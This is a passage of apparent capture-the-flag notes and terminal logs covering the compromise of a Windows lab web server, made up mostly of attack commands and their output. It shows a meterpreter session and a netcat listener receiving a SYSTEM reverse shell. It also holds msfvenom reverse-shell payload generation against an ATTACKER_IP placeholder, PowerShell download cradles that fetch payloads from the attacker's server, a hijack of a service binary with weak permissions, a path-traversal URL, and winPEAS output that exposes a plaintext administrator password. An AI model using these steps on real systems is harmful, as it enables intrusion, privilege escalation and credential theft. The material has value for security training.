100666/rw-rw-rw- 65536 fil 2019-08-03 17:43:51 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TM.blf
100666/rw-rw-rw- 524288 fil 2019-08-03 17:43:51 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288 fil 2019-08-03 17:43:51 +0000 NTUSER.DAT{3a3c0b2d-b123-11e3-80ba-a4badb27b52d}.TMContainer00000000000000000002.regtrans-ms
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 NetHood
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Pictures
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 PrintHood
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Recent
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Saved Games
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Searches
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 SendTo
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Start Menu
040777/rwxrwxrwx 0 dir 2019-08-03 17:43:51 +0000 Templates
040555/r-xr-xr-x 0 dir 2019-08-03 17:43:54 +0000 Videos
100666/rw-rw-rw- 839680 fil 2019-08-03 17:43:51 +0000 ntuser.dat.LOG1
100666/rw-rw-rw- 835584 fil 2019-08-03 17:43:51 +0000 ntuser.dat.LOG2
100666/rw-rw-rw- 20 fil 2019-08-03 17:43:51 +0000 ntuser.ini
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1029 fil 2019-08-04 11:36:42 +0000 System Scheduler.lnk
100666/rw-rw-rw- 282 fil 2019-08-03 17:43:54 +0000 desktop.ini
100666/rw-rw-rw- 32 fil 2019-08-04 18:51:42 +0000 root.txt
meterpreter > cat root.txt
7e13d97f05f7ceb9881a3eb3d78d3e72
------------
ALSO, WITH THESE PRIVILEGES WE WERE NOW ABLE TO EXPLOIT THE WINDOWSSCHEDULER SERVICE BY STOPPING AND STARTING THE SERVICE:
C:\Windows\System32>sc stop WindowsScheduler
sc stop WindowsScheduler
SERVICE_NAME: WindowsScheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x2
WAIT_HINT : 0x3e8
C:\Windows\System32>sc start WindowsScheduler
sc start WindowsScheduler
SERVICE_NAME: WindowsScheduler
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 3308
FLAGS :
┌──(root㉿kali)-[~]
└─# nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.82.143] from (UNKNOWN) [10.10.123.185] 49409
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
////// DRAFT, IGNORE //////
THESE STEPS REMAIN TO BE DONE ON ONE OF THE TWO BINARIES, TO CHECK:
////////
user@attackerpc$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
user@attackerpc$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Then we can fetch the payload from PowerShell with the following command:
PowerShell
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe
Once the payload is on the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we also want to grant full permissions to the Everyone group:
Command Prompt
C:\> cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move WService.exe WService.exe.bkp
1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-unpriv\rev-svc.exe WService.exe
1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> icacls WService.exe /grant Everyone:F
Successfully processed 1 files.
We start a reverse listener on our attacking machine:
KaliLinux
user@attackerpc$ nc -lvp 4445
And finally, restart the service. While in a normal scenario you would probably have to wait for the service to restart, you have been given privileges to restart the service yourself to save some time. Use the following commands from the cmd.exe prompt:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
///////////
PRIVILEGE ESCALATION WITHOUT METASPLOIT:
http://10.10.123.185/?theme=../../App_Data/files
WE CREATE A PAYLOAD WITH MSFVENOM AND THEN UPLOAD THE FILE TO THE VICTIM MACHINE:
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.123.185 - - [27/Jan/2024 07:18:31] "GET /shellpaimonX.exe HTTP/1.1" 200 -
10.10.123.185 - - [27/Jan/2024 07:22:06] "GET /winPEAS.bat HTTP/1.1" 200 -
powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
WE UPLOAD IT TO THE MACHINE'S TEMP DIRECTORY WITH A POWERSHELL COMMAND:
C:\Windows\Temp>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/shellpaimonX.exe','shellpaimonX.exe')"
dir
C:\Windows\Temp>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Windows\Temp
01/26/2024 11:18 PM <DIR> .
01/26/2024 11:18 PM <DIR> ..
08/06/2019 01:13 PM 8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019 01:13 PM 181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019 01:13 PM 1,206 cleanup.txt
08/06/2019 01:13 PM 421 cmdout
08/06/2019 01:11 PM 0 DMI2EBC.tmp
08/03/2019 09:43 AM 0 DMI4D21.tmp
08/06/2019 01:12 PM 8,743 EC2ConfigService_20190806141221.log
08/06/2019 01:12 PM 292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
01/26/2024 08:15 PM <DIR> Microsoft
01/26/2024 09:19 PM 48,640 rev-svc.exe
01/26/2024 08:15 PM 250,880 shellpaimon.exe
01/26/2024 11:18 PM 73,802 shellpaimonX.exe
08/06/2019 01:13 PM 21 stage1-complete.txt
08/06/2019 01:13 PM 28,495 stage1.txt
05/12/2019 08:03 PM 113,328 svcexec.exe
08/06/2019 01:13 PM 67 tmp.dat
01/26/2024 09:48 PM 69,175 windows-exploit-suggester.py
16 File(s) 1,077,479 bytes
3 Dir(s) 39,126,925,312 bytes free
WE UPLOAD WINPEAS FOR ENUMERATION ON THE MACHINE:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/winPEAS.bat','winPEAS.bat')"
C:\Windows\Temp>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.123.234:8081/winPEAS.bat','winPEAS.bat')"
dir
C:\Windows\Temp>dir
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Directory of C:\Windows\Temp
01/26/2024 11:22 PM <DIR> .
01/26/2024 11:22 PM <DIR> ..
08/06/2019 01:13 PM 8,795 Amazon_SSM_Agent_20190806141239.log
08/06/2019 01:13 PM 181,468 Amazon_SSM_Agent_20190806141239_000_AmazonSSMAgentMSI.log
08/06/2019 01:13 PM 1,206 cleanup.txt
08/06/2019 01:13 PM 421 cmdout
08/06/2019 01:11 PM 0 DMI2EBC.tmp
08/03/2019 09:43 AM 0 DMI4D21.tmp
08/06/2019 01:12 PM 8,743 EC2ConfigService_20190806141221.log
08/06/2019 01:12 PM 292,438 EC2ConfigService_20190806141221_000_WiXEC2ConfigSetup_64.log
01/26/2024 08:15 PM <DIR> Microsoft
01/26/2024 09:19 PM 48,640 rev-svc.exe
01/26/2024 08:15 PM 250,880 shellpaimon.exe
01/26/2024 11:18 PM 73,802 shellpaimonX.exe
08/06/2019 01:13 PM 21 stage1-complete.txt
08/06/2019 01:13 PM 28,495 stage1.txt
05/12/2019 08:03 PM 113,328 svcexec.exe
08/06/2019 01:13 PM 67 tmp.dat
01/26/2024 09:48 PM 69,175 windows-exploit-suggester.py
01/26/2024 11:22 PM 35,515 winPEAS.bat
17 File(s) 1,112,994 bytes
3 Dir(s) 39,126,888,448 bytes free
WE RUN WINPEAS:
C:\Windows\Temp>.\winPEAS.bat
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
dir
C:\inetpub\temp\appPools\Blog\Blog.config
C:\inetpub\temp\appPools\DefaultAppPool\DefaultAppPool.config
C:\inetpub\wwwroot\packages.config
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\change-password-success.aspx
C:\inetpub\wwwroot\Account\change-password.aspx
C:\inetpub\wwwroot\Account\password-retrieval.aspx
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\Content\images\blog\icon-pass.svg
C:\inetpub\wwwroot\setup\Web.config
C:\inetpub\wwwroot\setup\MySQL\MySQLWeb.Config
C:\inetpub\wwwroot\setup\MySQL\Archive\MySQLWeb.Config
C:\inetpub\wwwroot\setup\SQLite\SQLiteWeb.Config
C:\inetpub\wwwroot\setup\SQLServer\DbWeb.Config
C:\inetpub\wwwroot\setup\SQL_CE\SQL_CE_Web.Config
C:\Program Files\Amazon\Ec2ConfigService\ScramblePassword.exe
C:\Program Files\Amazon\Ec2ConfigService\ScramblePassword.exe.config
C:\Program Files\Amazon\Ec2ConfigService\ec2config-cli.exe.config
C:\Program Files\Amazon\Ec2ConfigService\ec2config-cli.log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigMonitor.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigMonitor.log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2ConfigServiceSettings.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2Runas.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Ec2WallpaperInfo.exe.config
C:\Program Files\Amazon\Ec2ConfigService\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\ScramblePassword.exe.config
C:\Program Files\Amazon\Ec2ConfigService\Plugins\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\AWS.EC2.Windows.CloudWatch.Configuration.dll
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\log4net.config
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\Microsoft.Practices.Unity.Configuration.dll
C:\Program Files\Amazon\Ec2ConfigService\Ssm\Packages\Microsoft.Practices.Unity.Interception.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.CloudWatch.exe.config
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.CloudWatch.log4net.config
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\AWS.EC2.Windows.CloudWatch.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsCloudWatch\Microsoft.Practices.Unity.Configuration.dll
C:\Program Files\Amazon\SSM\Plugins\awsDomainJoin\AWS.DomainJoin.exe.config
C:\Program Files\Amazon\SSM\Plugins\awsDomainJoin\log4net.config
C:\Program Files\Amazon\Xentools\Installer.exe.config
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Confirm-Password.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\New-RandomPassword.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Module\Scripts\Send-AdminCredentials.ps1
C:\ProgramData\Amazon\EC2-Windows\Launch\Settings\Ec2LaunchSettings.exe.config
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Randomize-LocalAdminPassword.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\Confirm-Password.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\New-RandomPassword.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Module\Scripts\Send-AdminCredentials.ps1
C:\Users\All Users\Amazon\EC2-Windows\Launch\Settings\Ec2LaunchSettings.exe.config
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Randomize-LocalAdminPassword.ps1
---
Scan complete.
PowerShell v2 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
PowerShellVersion REG_SZ 2.0
PowerShell v5 Version:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine
PowerShellVersion REG_SZ 4.0
Transcriptions Settings:
Module logging settings:
Scriptblog logging settings:
PS default transcript history
Checking PS history file
[+] MOUNTED DISKS
[i] Maybe you find something interesting
Caption
C:
[+] ENVIRONMENT
[i] Interesting information?
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Windows\system32\config\systemprofile\AppData\Roaming
APP_POOL_CONFIG=C:\inetpub\temp\apppools\Blog\Blog.config
APP_POOL_ID=Blog
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=HACKPARK
ComSpec=C:\Windows\system32\cmd.exe
CurrentFolder=C:\Windows\Temp\
CurrentLine= 0x1B[33m[+]0x1B[97m ENVIRONMENT
E=0x1B[
FP_NO_HOST_CHECK=NO
LOCALAPPDATA=C:\Windows\system32\config\systemprofile\AppData\Local
long=false
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
Percentage=1
PercentageTrack=34
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 79 Stepping 1, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=4f01
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Windows\TEMP
TMP=C:\Windows\TEMP
USERDOMAIN=WORKGROUP
USERNAME=HACKPARK$
USERPROFILE=C:\Windows\system32\config\systemprofile
windir=C:\Windows
[+] INSTALLED SOFTWARE
[i] Some weird software? Check for vulnerabilities in unknow software installed
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
Amazon
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft.NET
SystemScheduler
Windows Mail
Windows Mail
Windows NT
Windows NT
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\Program Files (x86)\SystemScheduler\
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
[+] Remote Desktop Credentials Manager
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager
Looking inside C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\
[+] Unattended files
[+] SAM and SYSTEM backups
[+] McAffee SiteList.xml
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
Volume in drive C has no label.
Volume Serial Number is 0E97-C552
[+] GPP Password
[+] Cloud Credentials
[+] AppCmd
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
C:\Windows\system32\inetsrv\appcmd.exe exists.
[+] Files in registry that may contain credentials
[i] Searching specific files that may contains credentials.
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
LastUsedUsername REG_SZ administrator
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ 4q6XvFES7Fdxs
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
W3SVC REG_SZ Software\Microsoft\W3SVC\CurrentVersion
Looking inside HKCU\Software\TightVNC\Server
Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions
Looking inside HKCU\Software\OpenSSH\Agent\Keys
C:\ProgramData\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\ProgramData\Amazon\EC2Launch\sysprep\unattend.xml
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
C:\Users\All Users\Amazon\EC2Launch\sysprep\unattend.xml
C:\Windows\Panther\setupinfo
C:\Windows\System32\inetsrv\appcmd.exe
C:\Windows\SysWOW64\inetsrv\appcmd.exe
C:\Windows\WinSxS\amd64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_64e8a179c6f2a167\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_824aabe06aee1705\ScheduledTasks.xml
C:\Windows\WinSxS\amd64_microsoft-windows-d..rvices-domain-files_31bf3856ad364e35_6.3.9600.16384_none_8bc96e4517571480\ntds.dit
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_01a7d2cf88c95dc0\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_01dac51388a3a832\appcmd.exe
C:\Windows\WinSxS\amd64_microsoft-windows-webenroll.resources_31bf3856ad364e35_6.3.9600.16384_en-us_7427d216367d8d3f\certnew.cer
C:\Windows\WinSxS\wow64_ipamprov-dhcp_31bf3856ad364e35_6.3.9600.16384_none_6f3d4bcbfb536362\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_ipamprov-dns_31bf3856ad364e35_6.3.9600.16384_none_8c9f56329f4ed900\ScheduledTasks.xml
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.16384_none_0bfc7d21bd2a1fbb\appcmd.exe
C:\Windows\WinSxS\wow64_microsoft-windows-iis-sharedlibraries_31bf3856ad364e35_6.3.9600.17031_none_0c2f6f65bd046a2d\appcmd.exe
C:\inetpub\wwwroot\Web.config
C:\inetpub\wwwroot\Account\Web.Config
C:\inetpub\wwwroot\admin\Web.Config
C:\inetpub\wwwroot\admin\app\editor\Web.Config
C:\inetpub\wwwroot\setup\Web.config
---
Scan complete.
The request will be processed at a domain controller for domain WORKGROUP.
USER INFORMATION
----------------
User Name SID
================ ==============================================================
iis apppool\blog S-1-5-82-2734256158-3485737692-275298378-1529073857-2789248872
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
[+] USERS
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest jeff
The command completed with one or more errors.
[+] GROUPS
[+] ADMINISTRATORS GROUPS
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
[+] CURRENT LOGGED USERS
[+] Kerberos Tickets
Current LogonId is 0:0x993a6
Cached Tickets: (0)
[+] CURRENT CLIPBOARD
[i] Any passwords inside the clipboard?
[*] SERVICE VULNERABILITIES
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
C:\Program Files\Amazon\EC2Launch\EC2Launch.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe NT SERVICE\TrustedInstaller:(F)
C:\Program Files\Amazon\XenTools\LiteAgent.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)
C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)
C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)
C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
Everyone:(I)(M)
[+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
[+] UNQUOTED SERVICE PATHS
[i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
[i] The permissions are also checked and filtered using icacls
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
aspnet_state
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe NT SERVICE\TrustedInstaller:(F)
AWSLiteAgent
C:\Program Files\Amazon\XenTools\LiteAgent.exe
NetTcpPortSharing
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe NT SERVICE\TrustedInstaller:(F)
PerfHost
C:\Windows\SysWow64\perfhost.exe
C:\Windows\SysWow64\perfhost.exe NT SERVICE\TrustedInstaller:(F)
PsShutdownSvc
C:\Windows\PSSDNSVC.EXE
